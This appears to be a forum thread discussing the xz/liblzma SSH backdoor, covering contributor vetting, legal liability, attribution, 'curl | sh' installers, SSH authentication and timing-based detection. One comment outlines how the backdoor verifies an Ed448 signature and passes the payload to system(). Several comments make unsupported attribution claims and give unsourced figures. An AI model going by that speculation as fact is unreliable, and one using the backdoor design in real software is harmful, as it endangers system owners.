You don’t need vouching for anyone. mDL is going to be a mechanism to have a government authority vouch your identity. Of course a state actor like this can forge the identity, but that forgery at least will give a starting point for the investigation to try to figure out who this individual is. There’s other technical questions about how you verify that the identity really is tied in some real way to the user at the other end (eg not a stolen identity) but there are things coming down that will help with that (ie authenticated chains of trust for hw that can attest the identity was signed on the given key in person and you require that attestation).
As for people accusing you of an intentional RCE, that may be a hypothetical scenario but I doubt it’s very real. Most people have a very long history of good contributions and therefore have built up a reputation that would be compared against the reality on the ground. No one is accusing Lasse Collin of participating in this even though arguably it could have been him all along for what anyone knows.
It doesn’t need to be perfect but directionally it probably helps more than it hurts.
All that being said, this clearly seems like a state actor which changes the calculus for any attempts like this since the funding and power is completely different than what most people have access to and likely we don’t have any really good countermeasures here beyond making it harder for obfuscated code to make it into repositories.
Your idea sounds nice in theory, but it's absolutely not worth the amount of effort. To put it in perspective, think about xz case, and how the amount of contributions would have prevented the release artifact (tar file) from being modified? Because other people would have used the tar file? Why? The only ones that use tarfiles are the ones that would be redistributing the code, they will not audit it. The ones that could audit it would look at the version system repository, not at the tar files. In other words, your solution wouldn't even be effective at potentially discovering this issue.
The only thing that would effectively do this, is that people stop trusting build artifacts and instead use direct from public repositories packaging. You could figure out if someone maliciously modified the release artifact by comparing it against the tagged version, but at that point, why not just shallow clone the entire thing and be done.
Even if you mandated two code reviewers per merge, the attacker can just have three fake personas backed by the same single human and use them to author and approve malware.
Also, in a more optimistic scenario without sockpuppets, it's unlikely that malicious and underhanded contributions will be caught by anyone that isn't a security researcher.
Does that mean we don’t look into changes in dependencies at all when bumping them?
As always, there's a relevant XKCD: #2347.[0] It's frightening how much of modern infrastructure depends on vulnerable systems.
then strange behavior and commits that claim to do one thing but actually do something else, are more likely to be spotted earlier than later.
https://en.wikipedia.org/wiki/Underhanded_C_Contest
It's actually an art to writing code like that, but it's not impossible and will dodge cursory inspection. And it's possible to have plausible deniability in the way it is constructed.
I'm not sure why my point is not getting across...
I'm not saying that these manual and automated checks make a project impervious to malicious actors. Successful attacks are always a possibility even in the strictest of environments.
What they do provide is a _chance reduction_ of these attacks being successful.
Just like following all the best security practices doesn't produce 100% secure software, neither does following best development practices prevent malicious code from being merged in. But this doesn't mean that it's OK to ignore these practices altogether, as they do have tangible benefits. I argue that projects that have them are better prepared against this type of attack than those that do not.
I wonder how good automated LLM-based code reviews would be at picking up suspicious patterns in pull requests.
dont you think that something as simple as a CLA (contributor legal agreement) would prevent this type of thing? of course creates noise in the open source contribution funnel, but let's be honest: if you are dedicating yourself to something like contributing to oss, signing a CLA should not be something unrealistic.
What exactly is a CLA going to do to a CCP operative (as appears to be the case with xz)? Do you think the party is going to extradite one of their state sponsored hacking groups because they got caught trying to implement a backdoor?
Or do you think they don’t have the resources to fake an identity?
The whole Chinese name and UTC+8 were a cover, as the person apparently was from EET
While it ultimately doesn’t matter if it was Russia or China beyond potential political fallout. Do you have a link to the proof pointing towards EET?
There was a link in this thread pointing to commit times analysis and it kinda checks out. Adding some cultural and outside world context, I can guess which alphabet this three-four-six-letter agency uses to spell it's name at least.
case closed. you are right... could of course make the things a bit more difficult for someone not backed by a state sponsor. but if that's the case, you are right.
Sadly the only way to even have a chance of fighting this is to insist on new contributors being vetted in person, and even that won’t be fool-proof.
It’s also not scalable and likely won’t ever happen, but it’s the only solution I can come up with.
CLA is not an ID check. It is to handover the rights for the code over to the project owners rather than doing any identity check.
agreed. but it does not mean i couldn't be. as per the terms, the content of a CLA could be anything. and that's my point
Then the question becomes "should we require ID for open source contributions?" and the answer is most likely no, not a good idea.
That's stretching the traditional definition. Usually CLAs are solely focused on addressing the copyright conditions and intellectual property origin of the contributed changes. Maybe just "contributor agreement" or "contributor contract" would describe that.
It never ceases to amaze me how great of lengths companies go to round securing the perimeter of the network but then have engineering staffs that just routinely brew install casks or vi/emacs/vscode/etc extensions.
Rust is arguably the programming language and/or community with the most secure set of defaults that are fairly impossible to get out of, but even at “you can’t play games with pointers” levels of security-first, the most common/endorsed path for installing it (that I do all the time because I’m a complete hypocrite) is:
https://www.rust-lang.org/tools/install
and that’s just one example, “yo dawg curl this shit and pipe it to sh so you can RCE while you bike shed someone’s unsafe block” is just muscle memory for way too many of us at this point.
I actually avoided installing Rust originally because I thought that install page was hijacked by an attacker or something.
Most languages don't have the prettiest install flows, but a random `curl | sh` is just lunacy if you're at all security conscious
yo dawg curl this shit and pipe it to sh so you can RCE while you bike shed someone’s unsafe block
Ahhh this takes me back to... a month ago...[0]
At least rust wraps function in main so you won't run a partial command, but still doesn't there aren't other dangers. I'm more surprised by how adamant people are about that there's no problem. You can see elsewhere in the thread that piping man still could (who knows!) pose a risk. Extra especially when you consider how trivial the fix is, especially when people are just copy pasting the command anyways...
It never ceases to amaze me how resistant people are to very easily solvable problems.
It’s worse than that. Build.rs is in no way sandboxed which means you can inject all sorts of badness into downstream dependencies not to mention do things like steal crypto keys from developers. It’s really a sore spot for the Rust community (to be fair they’re not uniquely worse but that’s a fact poor standard to shoot for).
What’s the game?
To be honest, it just was a matter of time till we find out our good faith beliefs are exploited. Behaviors like "break fast and fix eary" or "who wants to take my peojeklct ownership" just ask for trouble and yet it's unthinkable to live without them because open source is an unpaid labor of love to code. Sad to see such happening but I'm not surprised. I wish to get better tools (also open source) to combat such bad actors. Thanks to all the researchers out there who tries to protect us all.
Where is the law enforcement angle on this? This individual/organization needs to be on the top of every country's most wanted lists.
I understand the impulse to seek justice, but what crime have they committed? It's illegal to gain unauthorized access, but not to write vulnerable code. Is there evidence that this is being exploited in the wild?
I am definitely not a lawyer so I have no claim to knowing what is or is not a crime. However, if backdooring SSH on a potentially wide scale doesn't trip afoul of laws then we need to seriously have a discussion about the modern world. I'd argue that investigating this as a crime is likely in the best interest of public safety and even (I hesitate to say this) national security considering the potential scale of this. Finally, I would say there is a distinction between writing vulnerable code and creating a backdoor with malicious intent. It appears (from the articles I have been reading so far) that this was malicious, not an accident or lack of skill. We will see over the next few days though as more experts get eyes on this.
Agreed on a moral level, and it's true that describing this as simply "vulnerable code" doesn't capture the clear malicious intent. I'm just struggling to find a specific crime. CFAA requires unauthorized access to occur, but the attacker was authorized to publish changes to xz. Code is speech. It was distributed with a "no warranty" clause in the license.
If more than one person was involved, it'd presumably fall under criminal conspiracy. Clearly this was an overt act in furtherance of a crime (unauthorized access under CFAA, at the least).
The criminal conspiracy laws don’t apply to the organizations that write this kind of code, just like murder laws don’t.
Sure they do. Getting the perpetrator into your jurisdiction is the tough part.
Putin is, for example, unlikely to go anywhere willing to execute an ICC arrest warrant.
Nah, the CIA assassinates people in MLAT zones all the time. The laws that apply to you and I don’t apply to the privileged operators of the state’s prerogatives.
We don’t even know that this specific backdoor wasn’t the NSA or CIA. Assuming it was a foreign intelligence service because the fake name was asian-sounding is a bit silly. The people who wrote this code might be sitting in Virginia or Maryland already.
Virginia or Maryland
Eastern Europe, suggest the timestamp / holiday analysts. https://rheaeve.substack.com/p/xz-backdoor-times-damned-time...
Eastern Europe - 25th? Not 24th?
Note that while “Eastern Europe” has firm connotations with countries of which some are known for having corrupt autocracies, booming shady businesses, and organized crime and cybercrime gangs in varying proportions, the time zone mentioned also covers Finland, from which the other author is supposed to be.
The people who wrote this code might be sitting in Virginia or Maryland already.
Sure, that’s possible. They will as a result probably avoid traveling to unfriendly jurisdictions without a diplomatic passport.
They will as a result probably avoid traveling to unfriendly jurisdictions without a diplomatic passport.
First of all, it's not like their individual identities would ever be known.
Second, they would already know that traveling to a hostile country is a great way to catch bullshit espionage charges, maybe end up tortured, and certainly be used as a political pawn.
Third, this is too sloppy to have originated from there anyways—however clever it was.
CFAA covers this. Its a crime to
> knowingly [cause] the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;
Where one of the definitions of “protected computer” is one that is used in interstate commerce, which covers effectively all of them.It seems like the backdoor creates the potential to "cause damage" but doesn't [provably?] cause damage per se?
The author of the backdoor doesn't themselves "[cause] the transmission of a program ...". Others do the transmission.
Seems weak, unless you know of some precedent case(s)?
The malicious author caused the transmission of the release tarball to GitHub and the official project site. This act was intentional and as a direct result other computers were damaged (when their administrators unknowingly installed the backdoored library).
You’ve got to be joking if you’re saying that this wouldn’t be an open and shut case to prosecute. It’s directly on point. Law isn’t code, any jury would have zero trouble convicting on these facts.
Hello fellow "law isn't code" traveller. (my least favorite engineer habit!)
The back door is damage. The resulting sshd is like a door with a broken lock. This patch breaks the lock. Transmitting the patch caused intentional damage.
Law isn't code. If someone finds precedent, there will be a way to argue it doesn't cover this specific scenario. They call this conversational process "hypos" in law school, and this fundamental truth is why you never hear of a lawyer being stumped as to how to defend a client.
Ultimately, the CFAA will get it done if it gets that far, armchair lawyering aside.
To pressure test this fully, since this can be caricatured as "we can punish degenerate behavior as needed", which isn't necessarily great: it's also why there's a thin line between a authoritarian puppet judiciary and a fair one.
CFAA covers distribution of malicious software without the owners consent, the Wire Fraud Act covers malware distribution schemes intended to defraud for property, Computer Misuse act in the UK is broad and far reaching like the CFAA, so this likely fall afoul of that. The GDPR protects personal data, so there's possibly a case that could be made that this violates that as well, though that might be a bit of reach.
In which case the defense will claim, correctly, that this malware was never distributed. It was caught. "Attempted malware distribution" may not actually be a crime (but IANAL so I don't know).
Folks who run Debian SID or Fedora testing may disagree.
It is like opening the door of a safe and letting someone else rob the money inside.
This is way beyond "moral level".
Laws don’t fix technical issues any more than they fix physical ones. Clearly this was possible, so it could be done by a foreign intelligence agency or well-hidden criminal organization.
I think this is probably illegal. But, I think we should not punish this sort of thing too harshly. Tech is an ecosystem. Organizations need to evolve to protect themselves. Instead, we should make companies liable for the damage that happens when they are hit by one of these attacks.
Before anyone calls it out: yes, this will be blaming the victim. But, companies aren’t people, and so we don’t really need to worry about the psychological damage that victim blaming would do, in their case. They are systems, that respond to incentives, and we should provide the incentives to make them tough.
It's not simply vulnerable code: it's an actual backdoor. That is malware distribution (without permission) and is therefore illegal.
Is it illegal to distribute malware? I see security researchers doing it all the time for analysis purposes.
No, it is not illegal to distribute malware by itself, but it is illegal to trick people into installing malware. The latter was the goal of the XZ contributor.
I assume you're talking from a USC perspective? Can you say which specific law, chapter, and clause applies?
I would somewhat agree, but then come to mind "what is the "legal" definition of malware ?".
Some people would say that most drm software would act like malware/ransomware.
And tricking people to install such software is only matter of an ambiguously worded checkbox.
specifically, thevCFAA covers distribution of malicious software without the owners consent. Security researchs downloading malware implicitly give consent to be downloading malware marked as such.
What is constantly overlooked here on HN is that in legal terms, one of the most important things is intent. Commenters on HN always approach legal issues from a technical perspective but that is simply not how the judicial system works. Whether something is “technically X” or not is irrelevant, laws are usually written with the purpose of catching people based on their intent (malicious hacking), not merely on the technicalities (pentesters distributing examples).
Yeah, it bothers me so much. They really seem to think that "law is code".
It is code, but it runs on human wetware which can decode input about actual events into output about intent, and reach consensus about this output via proper court procedures.
Calling this backdoor "vulnerable code" is a gross mischaracterization.
This is closer to a large scale trojan horse, that does not have to be randomly discovered by a hacker to be exploited, but is readily available for privileged remote code execution by whoever have the private key to access this backdoor.
If CFAA doesn't get this guy behind bars then the CFAA is somehow even worse. Not only is it an overbroad and confusing law, it's also not broad enough to actually handcuff people who write malicious code.
I'd be surprised if the attacker didn't meet the criteria for mens rea.
In the UK, at least, unauthorised access to computer material under section 1 of the Computer Misuse Act 1990 - and I would also assume that it would also fall foul of sections 2 ("Unauthorised access with intent to commit or facilitate commission of further offences") and 3A ("Making, supplying or obtaining articles for use in offence under section 1, 3 or 3ZA") as well.
Though proving jurisdiction would be tricky...
Based on the level of sophistication being alluded to, I'm personally inclined to assume this is a state actor, possible even some arm of the U.S. govt.
possible even some arm of the U.S. govt.
Possible. But why mention U.S. specifically? Is it more likely than Russia, Iran, China, France ... ?
The US is behind more documented backdoors than those other countries.
Highly likely, China has been estimated to have cyberhacking resources that are 10-50x what the USA has currently. It's not even close. The USA will have to up it's game soon or accept China being able to shut down large swathes of the grid and critical infrastructure at will
This individual/organization needs to be on the top of every country's most wanted lists
Because if the "organization" is a U.S. agency, not much is going to happen here. Russia or China or North Korea might make some strongly worded statements, but nothing is going to happen.
It's also very possible that security researchers won't be able to find out, and government agencies will finger-point as a means of misdirection.
For example, a statement comes out in a month that this was North Korea. Was it really? Or are they just a convenient scapegoat so the NSA doesn't have to play defense on its lack of accountability again?
To me it seems too clumsy to be USG. They seem to prefer back doors that are undetectable or hide in plain sight.
But it might be an NSA op designed to instigate a much needed serious examination of the supply chain.
That would honestly be one of the most impactful bits of public service to fall out of any agency, regardless of country. Even if this is nefarious, a couple of intentionally clumsy follow-ups designed to draw further attention would be amazing to see. Think chaos monkey for software supply chain.
Can the community aspects of FOSS survive a Spy vs Spy environment though?
I don't know, but the answer is irrelevant to whether we are in one (we are).
I shudder to think what lurks in the not-open-source world. Closed source software/firmware/microcode, closed spec/design hardware; and artificial restriction of device owners from creating replacement code, or modifying code in consumer and capital goods containing universal machines as components; are significant national security threats and the practice of keeping design internals and intent secret in these products produces a cost on society.
I propose that products which don't adhere to GNU-like standards of openness (caveat*) get national sales taxed some punitive obscene percentage, like 100%. This way the government creates an artificial condition which forces companies to comply lest their market pricing power be absolutely hobbled. If say your company makes five $10MM industrial machines for MEGACORP customer and you're the only game in town, MEGACORP can pay the sales tax. Brian, Dale, and Joe Sixpack can't afford $2,500+ iPhones and Playstations, or $70,000 base model Honda Civics (yes this should apply to cars and especially medical devices/prosthetics), so when Company B comes around making a somewhat inferior competing fully open product then Company A making the proprietary version loses a huge chunk of market share.
(*But not the GNU-spirit distribution rights, so the OEM or vendor is still the only entity legally allowed to distribute [except for national emergency level patches]. Patent rights still apply.)
This is the most direct and sane way to address the coming waves of decade+ old lightbulbs and flatscreens. It has fewest "But if" gotcha exceptions with which to keep screwing you. Stop sticking up for your boss and think about the lack of access to your own devices, or better yet the implicit and nonconsensual perpetual access vendors maintain to universal machines which by all rights only you should have sovereign control over (like cooking your own microcode or tweaking Intel's [but not distributing your tweaks to Intel's])!
Remember how bad, slow, and obvious Dual_EC_DRNG was?
Overcomplicated design, sloppy opsec and Eastern European time zone altogether sound more like an attempt to snatch some bitcoins by a small group of people in places.
I wonder what had happened in Eastern Europe ~2 years ago...
The obvious, but not yet pointed out part here -- not everything we call "EE" here is actually using EET/EEST.
easy there. calling the cops on the NSA might be treason or something
I would have thought NSA would have hardware/firmware backdoor everywhere and wouldn't need this.
Probably not for fully Chinese hardware. Although this backdoor is only x86 so it still wouldn't work there.
Like that spiderman meme, it's all the NSA
CISA had a report on this pretty quickly. I think they refer cases to Secret Service for enforcement. But really, we seemingly have no idea who or where the perpetrator is located. This could easily be a state actor. It could be a lone wolf. And the effects of the attack would be global too, so jurisdiction is tricky. We really have no idea at this point. The personas used to push the commits and push for inclusion were almost certainly fronts. I'm sure github is sifting through a slew of subpoenas right now.
github retains an incredible amount of data to review. but if it is a state actor, they likely covered their tracks very well. when i found the original address of the person who hacked elon musk's twitter account it led to an amazon ec2 instance. that instance was bought with stolen financial information and accessed via several vpns and proxies. i would expect state actors to further obfuscate their tracks with shell companies and the like
State actors get to invent people. Literally.
Lmao it’s a state actor bro
Its been all of 24 hours, these things take time. Presumably someone doing an attack this audacious took steps to cover their tracks and is using a fake name.
So this basically means to scan for this exploit remotely we'd need the private key of the attacker which we don't have. Only other option is to run detection scripts locally. Yikes.
One completely awful thing some scanners might choose to do is if you're offering RSA auth (which most SSH servers are and indeed the SecSH RFC says this is Mandatory To Implement) then you're "potentially vulnerable" which would encourage people to do password auth instead.
Unless we find that this problem has somehow infested a lot of real world systems that seems to me even worse than the time similar "experts" decided that it was best to demand people rotate their passwords every year or so thereby ensuring the real security is reduced while on paper you claim you improved it.
Have to admit I've never understood why password auth is considered so much worse than using a cert - surely a decent password (long, random, etc) is for all practical purposes unguessable, and so you're either using a private RSA key that no-one can guess, or a password that no-one can guess, and then what's the difference? With the added inconvenience of having to pass around a certificate if you want to login to the same account from from multiple sources.
It depends what happens to the password. Typically it's sent as a bearer credential. But there are auth schemes (not widely used these days) where the password isn't sent over the wire.
Isn't it pretty standard practice to salt and hash the password client-side before sending it over the wire?
No, usually it's sent in plain text to the server, however encapsulated.
Wow, really? Ten years ago, it was drilled into me to never send a password like that, especially since the server shouldn't have the plain version anyway (so no reason for the client to send it).
https://owasp.org/www-community/OWASP_Application_Security_F... says "Salted hash for transmitting passwords is a good technique. This ensures that the password can not be stolen even if the SSL key is broken."
I didn't want to believe you, but man, I just checked a few websites in the network inspector... and it seems like GMail, Hackernews, Wordpress, Wix, and Live.com all just sent it in plaintext with only SSL encryption :(
That's a bit disappointing. But TIL. Thanks for letting me know!
It doesn’t actually do anything because if SSL is compromised then all of the junk you think you are telling the client to do to the password is via JavaScript that is also compromised.
If you’re worried about passive listeners with ssl private keys, perfect forward secrecy at the crypto layer solved that a long time ago.
For browsers at least, sending passwords plainly over a tls session is as good as it gets.
It's not to protect against MITM but against credential reuse. It offers no additional security over SSL but what it does protect against is user passwords being leaked and attackers being able to reuse that same password across the user's other online accounts (banks, etc.).
Salted hash for transmitting passwords is a good technique. This ensures that the password can not be stolen even if the SSL key is broken
I'm a little confused with this recommendation
How server is supposed to verify user's password in this case? Store the same hash with exactly the same salt in the database, effectively making the transmitted salted hash a cleartext password?
Yes, the server should never have the cleartext password. In this case the salted hash is the same as a password to you, but it protects users who reuse the same password across different sites. If your entire password DB gets leaked, the attacker would be able to login to your site as your users, but they wouldn't be able to login as those users to other sites without brute forcing all the hashes.
Edit: I guess the reverse is also true, that is, leaked user passwords from other sources can't be easily tested against your user accounts just by sending a bunch of HTTP requests to your server. The attacker would have to at least run the passwords through your particular salted hash scheme first (which they can get by reverse engineering your client, but it's extra labor and computation).
That's exactly the case with HTTP credentials and most authentication frameworks...
If you want to hop into a rabbit hole, try taking look in Steam's login send the user and pass))
If TLS break then all is untrusted anyway! If you read hash as MITM you can replay it as pass equivalent and log in with hash, do not need knowledge of the original pass. You can just inject the script to exfilatrate original pass before hashing. CSP is broken, since you can edit header to give your own script a inline nonce. I think everything is reliant on TLS in end.
I think 10yr ago before TLS was 99%+ standard on all sites many people would come up with schemes, forums would md5 pass client side and send md5, all sorts were common. But now trust is in TLS.
Even if you use a scheme where the password never traverses the wire, the schemes still require the server to know what your password is in order to perform the authentication. So a compromised server still leads to compromise of your secret credential. Public key authentication does not have this property.
One of the biggest differences is that if you're using password auth, and you are tricked into connecting to a malicious server, that server now has your plaintext password and can impersonate you to other servers.
If you use a different strong random password for every single server, this attack isn't a problem, but that adds a lot of management hassle compared to using a single private key. (It's also made more difficult by host key checking, but let's be honest, most of us don't diligently check the fingerprints every single time we get a mismatch warning.)
In contrast, if you use an SSH key, then a compromised server never actually gets a copy of your private key unless you explicitly copy it over. (If you're have SSH agent forwarding turned on, then during the compromised connection, the server can run a "confused deputy" attack to authenticate other connections using your agent's identity. But it loses that ability when you disconnect.)
if you're using password auth, and you are tricked into connecting to a malicious server, that server now has your plaintext password and can impersonate you to other servers.
Why would the password be sent in plaintext instead of, say, sending a hash of the password calculated with a salt that is unique per SSH server? Or something even more cryptographically sound.
In fact, passwords in /etc/shadow already do have random salts, so why aren't these sent over to the SSH client so it can send a proper hash instead of the plaintext password?
It's a little bit more complicated than just sending a hash of the password, but there are ways to authenticate using hashed passwords without sending the password over the wire, for example https://en.wikipedia.org/wiki/Digest_access_authentication or https://en.wikipedia.org/wiki/Password-authenticated_key_agr...
Even so, these protocols require the server to know your actual password, not just a hash of the password, even though the password itself never traverses the network. So a compromised server can still lead to a compromised credential, and unless you use different passwords for every server, we're back to the same problem.
If the hash permits a login then having a hash is essentially equivalent to having a password. The malicious user wouldn't be able to use it to sudo but they could deploy some other privilege escalation once logged in.
Not a rhetorical question: couldn't the malicious server relay the challenge from a valid server for to you to sign, and impersonate you that way?
No, these schemes use the pub/private keys to setup symmetric crypto, so just passing it along does you no good because what follows is a bunch of stuff encrypted by a session key only the endpoints know.
If I am a server and have your public key in an authorized_keys file, I can just encrypt a random session key using that and only you will be able to decrypt it to finish setting up the session.
This is why passwords and asymmetric crypto are worlds apart in security guarantees.
If a man in the middle relays a public key challenge, that will indeed result in a valid connection, but the connection will be encrypted such that only the endpoints (or those who possess a private key belonging to one of the endpoints) can read the resulting traffic. So the man in the middle is simply relaying an encrypted conversation and has no visibility into the decrypted contents.
The man in the middle can still perform denial of service, by dropping some or all of the traffic.
The man in the middle could substitute their own public key in place of one of the endpoint's public keys, but if each endpoint knows the other endpoint's key and is expecting that other key, then an unexpected substitute key will raise a red flag.
On that last point, I wouldn't pass around the certificate to log in from multiple sources, rather each source would have its own certificate. That is easy & cheap to do (especially with ed25519 certs).
Ah right, that's useful, thanks. Presumably if you need to login from an untrusted source (e.g. in an emergency), then you're out of luck in that case? Do you maybe keep an emergency access cert stashed somewhere?
I sometimes ask this as an interview question. Hardly anybody knows the answer.
So don't you want to enlighten us with the answer?
Have to admit I've never understood why password auth is considered so much worse than using a cert
Password auth involves sending your credentials to the server. They're encrypted, but not irreversibly; the server needs your plaintext username and password to validate them, and it can, in principle, record them to be reused elsewhere.
Public key and certificate-based authentication only pass your username and a signature to the server. Even if you don't trust the server you're logging into, it can't do anything to compromise other servers that key has access to.
The difference, IMHO, is that it's easier to pick an easy guessable password than it is to create an insecure RSA key (on purpose).
surely a decent password (long, random, etc) is for all practical purposes unguessable
Sadly that is not how normies use passwords. WE know what passwords managers are for. Vast majority of people outside our confined sphere do not.
In short: password rotation policies make passwords overall less secure, because in order to remember what the new password is, people apply patterns. Patterns are guessable. Patterns get applied to future password as well. This has been known to the infosec people since 1990's because they had to understand how people actually behave. It took a research paper[0], published in 2010, to finally provide sufficient data for that fact to become undeniable.
It still took another 6-7 years until the information percolated through to the relevant regulatory bodies and for them to update their previous guidance. These days both NIST and NCSC tell in very clear terms to not require password rotation.
0: https://www.researchgate.net/publication/221517955_The_true_...
A lot of it has to do with centralizing administration. If you have more than one server and more than one user, certificates reduce a NxM problem into N+M instead.
Certificates can be revoked, they can have short expiry dates and due to centralized administration, renewing them is not terribly inconvenient.
On top of that they are a lot more difficult to read over the shoulder, to some degree that can be considered the second factor in a MFA scheme. Same reasons why passkeys are preferred over passwords lately. Not as secure as a HW-key, still miles better than “hunter2”.
It might be possible to use timing information to detect this, since the signature verification code appears to only run if the client public key matches a specific fingerprint.
The backdoor's signature verification should cost around 100us, so keys matching the fingerprint should take that much longer to process than keys that do not match it. Detecting this timing difference should at least be realistic over LAN, perhaps even over the internet, especially if the scanner runs from a location close to the target. Systems that ban the client's IP after repeated authentication failures will probably be harder to scan.
(https://bench.cr.yp.to/results-sign.html lists Ed448 verification at around 400k cycles, which at 4GHz amounts to 100us)
According to[1], the backdoor introduces a much larger slowdown, without backdoor: 0m0.299s, with backdoor: 0m0.807s. I'm not sure exactly why the slowdown is so large.
[1] https://www.openwall.com/lists/oss-security/2024/03/29/4
The effect of the slowdown on the total handshake time wouldn't work well for detection, since without a baseline you can't tell if it's slow due to the backdoor, or due to high network latency or a slow/busy CPU. The relative timing of different steps in the TCP and SSH handshakes on the other hand should work, since the backdoor should only affect one/some steps (RSA verification), while others remain unaffected (e.g. the TCP handshake).
However only probabilistic detection is possible that way and really 100us variance over the internet would require many many detection attempts to discern.
The tweet says "unreplayable". Can someone explain how it's not replayable? Does the backdoored sshd issue some challenge that the attacker is required to sign?
What it does is this: RSA_public_decrypt verifies a signature on the client's (I think) host key by a fixed Ed448 key, and then if it verifies, passes the payload to system().
If you send a request to SSH to associate (agree on a key for private communications), signed by a specific private key, it will send the rest of the request to the "system" call in libc, which will execute it in bash.
So this is quite literally a "shellcode". Except, you know, it's on your system.
Imagine a future where state actors have hundreds of AI agents fixing bugs, gaining reputation while they slowly introduce backdoors. I really hope open source models succeed.
Why would open source models make this scenario you are painting better?
Because in the closed source model the frustrated developer that looked into this SSH slowness submits a ticket for the owner of the malicious code to dismiss.
Not necessarily. A frustrated developer posts about it, it catches attention of someone who knows how to use Ghidra et al, and it gets dug out quite fast.
Except, with closed-source software maintained by a for-profit company, suck cockup would mean a huge reputational hit, with billions of dollars of lost market cap. So, there are very high incentives for companies to vet their devs, have proper code reviews, etc.
But with open-source, anyone can be a contributor, everyone is a friend, and nobody is reliably real-world-identifiable. So, carrying out such attacks is easier by orders magnitude.
Absolutely not. Getting a job at any critical infrastructure software dev company is easier than contributing to the Linux kernel.
Can confirm. I may work at Meta, but I was nearly banned from contributing to an open source project because my commits kept introducing bugs.
So, there are very high incentives for companies to vet their devs, have proper code reviews, etc.
I'm not sure about that. It takes a few leetcode interviews to get in major tech companies. As for the review process, it's not always thorough (if it looks legit and the tests pass...). However, employees are identifiable and would take huge risk to be caught doing anything fishy.
We witnessed Juniper generating their VPN keys with Dual EC DRGB, and then the generator constants subverted with Juniper claiming of now knowing how did it happen.
I don’t think it affected Juniper firewall business in any significant way.
It’s insane to consider the actual discovery of this to be anything other than a lightning strike. What’s more interesting here is that we can say with near certainty that there are other backdoors like this out there.
Time to start looking at similar cases for sure.
This seems completely unrelated to the grandparent comment’s mention of open source LLMs
... if we want security it needs trust anyway. it doesn't matter if it's amazing Code GPT or Chad NSA, the PR needs to be reviewed by someone we trust.
it's the trust that's the problem.
web of trust purists were right just ahead of the time.
It would actually be sort of interesting if multiple adversarial intelligence agencies could review and sign commits. We might not trust any particular intelligence agency, but I bet the NSA and China would both be interested in not letting much through, if they knew the other guy was looking.
That is an interesting solution. If China, US, Russia, EU, etc all sign off and say "yep this is secure" we should trust it. Since if they think they found an exploit, they might assume the other people found an exploit. This is a little bit like the idea of a fair cut for a cake. If you have two people that want the last slice of cake, you have one cut and the other choose the first slice, since the chooser will choose the biggest slice, so the slicer knowing they will get the smaller will make it as equal as possible. In this case the NSA makes the cut (the code), and Russia / China chooses if its allowed in.
NSA makes the cut and China picks the public key to use.
In all seriousness, those people will quickly find some middle ground and will just share keys with each other
Chad NSA
It's called the ANS is Chad.
this is why microsoft bought github and has been onboarding major open source projects. they will be the trusted 3rd party (whether we like it our not is a different story)
That just…doesn’t make any sense.
Everyone starts from zero and works their way up.
Imagine a world where a single OSS maintainer can do the work of 100 of today’s engineers thanks to AI. In the world you describe, it seems likely that contributors would decrease as individual productivity increases.
Wouldn't everything produced by an AI explicitly have to be checked/reviewed by a human? If not, then the attack vector just shifts to the AI model and that's where the backdoor is placed. Sure, one may be 50 times more efficient at maintaining such packages but the problem of verifiably secure systems actually gets worse not better.
And be burned out 100x faster
I work for a large closed-source software company and I can tell you with 100% that it is full of domestic and foreign agents. Being open source means that more eyes can and will look at something. That only increases the chance of malicious actions being found out ... just like this supply-chain attack.
Reminds me of the scene in Fight Club where the unreliable narrator is discussing car defects to a fellow airline passenger.
Quoting from flawed memory:
Passenger: Which company?
Narrator: A large one.
Why AI agents?
Presumably the state actors are looking for other state actor's bugs, and would try to fix them, or least fix them to only work for them.
That's quite a game of cat and mouse.
If that's true, then I am 100% certain that this backdoor is from a nation state-level actor.
I already felt like this was way too sophisticated for a random cybercriminal. It's not like making up fake internet identities is very difficult, but someone has pretended to be a good-faith contributor for ages, in a surprisingly long-term operation. You need some funding and a good reason to pull off something like that.
This could also be a ransomware group hoping to break into huge numbers of servers, though. Ransomware groups have been getting more sophisticated and they will already infiltrate their targets for months at a time (to make sure all old backups are useless when they strike), so I wouldn't put it past them to infiltrate the server authentication mechanism directly.
Whoever this was is going after a government or a crypto exchange. Don't think anything else merits this effort.
I don't know that they had a singular target necessarily. Much like Solarwinds, they could take their pick of thousands of targets if this had gone undetected.
I think we can all agree this attacker was sophisticated. But why would a government want to own tons of random Linux machines that have open sshd mappings? You have to expose sshd explicitly in most cloud environments (or on interesting networks worthy of attack.) Besides, the attacker must've known that if this is all over the internet eventually someone is going to notice.
I think the attacker had a target in mind. They were clearly focused on specific Linux distros. I'd imagine they were after a specific set of sshd bastion machine(s). Maybe they have the ability to get on the VPN that has access to the bastion(s) but the subset of users with actual bastion access is perhaps much smaller and more alert/less vulnerable to phishing.
So what's going to be the most valuable thing to hack that uses Linux sshd bastions? Something so valuable it's worth dedicating ~3 years of your life to it? My best guess is a crypto exchange.
But why would a government want to own tons of random Linux machines that have open sshd mappings?
They don’t want tons. They want the few important ones.
Turns out it was easiest to get to the important ones by pwning tons of random ones.
That still implies there was a target in mind. But also they would've had to assume the access would be relatively short-lived. This means to me they had something specific they wanted to get access to, didn't plan to be there long, and weren't terribly concerned about leaving a trail of their methods.
Why couldn't they have had 50 or 100 targets in mind, and hoped that the exploit would last for at least the month (or whatever) they needed to accomplish their multiple, unrelated goals?
I think your imagination is telling you a story that is prematurely limiting the range of real possibilities.
Something so valuable it's worth dedicating ~3 years of your life to it?
This isn't the right mindset if you want to consider a state actor, particularly for something like contributing to an open source project. It's not like you had to physically live your cover life while trying infiltrate a company or something.
Yes, this is a lot of resources to spend, but at the same, even dedicating one whole FTE 3 years isn't that much resources. It's just salary at that point.
Government have lot of money and time to spend. So having one more tool in box for that single time you need to access a target where this work is entirely reasonable investment. Would this if it weren't used have been noticed possibly in years? That gives quite a lot of room to find target for times when it is needed.
And you could have multiple projects doing this type of work in parallel.
Otoh, maybe they just wanted to create a cryptomining farm. Lol.
Don't underestimate the drive some people have to make a buck.
people downvoting you already forgot the cia fundraiser in the 80s...
I would expect a nation state to have better sock puppet accounts though.
better sock puppet accounts though.
Seems like to me they had perfectly good enough sock puppet accounts. It wasn't at all obvious they were sock puppets until someone detected the expliot.
Those guys are estimated to have made $1 billion last year - have to think that buys some developer talent.
What is the possibility of identity theft that is commenced on state-level? There are reports that the time the backdoor was pushed do not match the usual timing of changes committed by the author.
It also seems like a convenient ground for a false flag operation: hijacking an account that belong to a trustworthy developer from another country.
And risk discovery by the trustworthy developer? Unlikely.
